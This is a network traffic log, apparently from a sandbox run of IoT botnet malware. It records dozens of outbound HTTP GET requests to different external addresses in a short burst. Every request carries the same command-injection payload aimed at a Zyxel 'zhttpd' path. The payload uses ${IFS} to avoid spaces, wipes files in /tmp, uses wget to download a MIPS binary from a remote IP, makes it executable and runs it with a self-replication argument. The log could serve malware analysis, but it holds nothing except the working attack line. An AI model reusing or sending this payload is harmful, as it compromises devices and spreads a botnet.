                                            Feb 2, 2024 06:21:24.867712021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7497192.168.2.1536350116.109.48.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867733955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7498192.168.2.1533890182.58.162.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867791891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7499192.168.2.1539434128.155.40.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867819071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7500192.168.2.154724280.36.129.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867854118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7501192.168.2.1534300154.87.176.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867882013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7502192.168.2.1538908145.111.21.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867925882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7503192.168.2.1538860193.99.22.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.867976904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7504192.168.2.153733820.190.61.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868009090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7505192.168.2.1548912222.156.118.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868032932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7506192.168.2.155912087.11.13.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868093967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7507192.168.2.154480665.35.240.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868141890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7508192.168.2.1556042115.161.194.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868195057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7509192.168.2.155310880.100.89.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868232012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7510192.168.2.154331279.205.211.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868292093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7511192.168.2.154029885.72.187.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868355989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7512192.168.2.1539172199.75.201.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868396997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7513192.168.2.155780631.189.202.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868411064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7514192.168.2.1536050161.191.204.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868459940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7515192.168.2.155377018.33.73.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868488073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7516192.168.2.1537550147.85.156.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868518114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7517192.168.2.1544350211.16.127.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868571043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7518192.168.2.156076895.245.114.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868592978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7519192.168.2.1544066126.176.234.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868632078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7520192.168.2.155345087.107.229.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868690014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7521192.168.2.1548078172.166.37.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868726969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7522192.168.2.1557676186.208.194.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868756056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7523192.168.2.155482824.131.108.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868804932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7524192.168.2.154599889.251.161.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868853092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7525192.168.2.15431461.139.55.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868889093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7526192.168.2.1537080183.115.250.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868912935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7527192.168.2.155911652.94.31.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.868947029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7528192.168.2.1540400196.103.16.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869021893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7529192.168.2.1538100120.85.204.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869055033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7530192.168.2.1553902218.173.245.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869096994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7531192.168.2.155585466.247.123.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869127035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7532192.168.2.1553026199.153.254.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869177103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7533192.168.2.154832851.172.134.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869203091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7534192.168.2.153564461.186.121.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869230986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7535192.168.2.155783294.131.71.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869267941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7536192.168.2.1534262126.20.78.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869302988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7537192.168.2.156002048.215.158.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869368076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7538192.168.2.1543124151.200.88.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869407892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7539192.168.2.1543650150.86.173.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869457006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7540192.168.2.1534042194.5.255.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869482994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7541192.168.2.1547592164.20.160.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869524956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7542192.168.2.154350419.142.87.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869566917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7543192.168.2.1539854169.184.223.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869620085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7544192.168.2.1549000124.253.177.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869657040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7545192.168.2.154673838.160.55.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869713068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7546192.168.2.153297837.247.42.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869755983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7547192.168.2.1544058171.194.17.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869791985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7548192.168.2.1547244195.169.0.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869824886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7549192.168.2.1552296151.245.91.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869883060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7550192.168.2.154587614.5.191.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869914055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7551192.168.2.1544148208.30.176.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.869962931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7552192.168.2.1542648155.165.13.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870008945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7553192.168.2.1533058220.246.123.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870057106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7554192.168.2.154263694.214.12.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870098114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7555192.168.2.153673458.206.47.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870130062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7556192.168.2.154290457.97.97.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870172024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7557192.168.2.1533134213.4.236.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870233059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7558192.168.2.154666487.221.38.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870250940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7559192.168.2.154828673.191.88.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870305061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7560192.168.2.1544092108.11.108.122443
                                            TimestampBytes transferredDirectionData
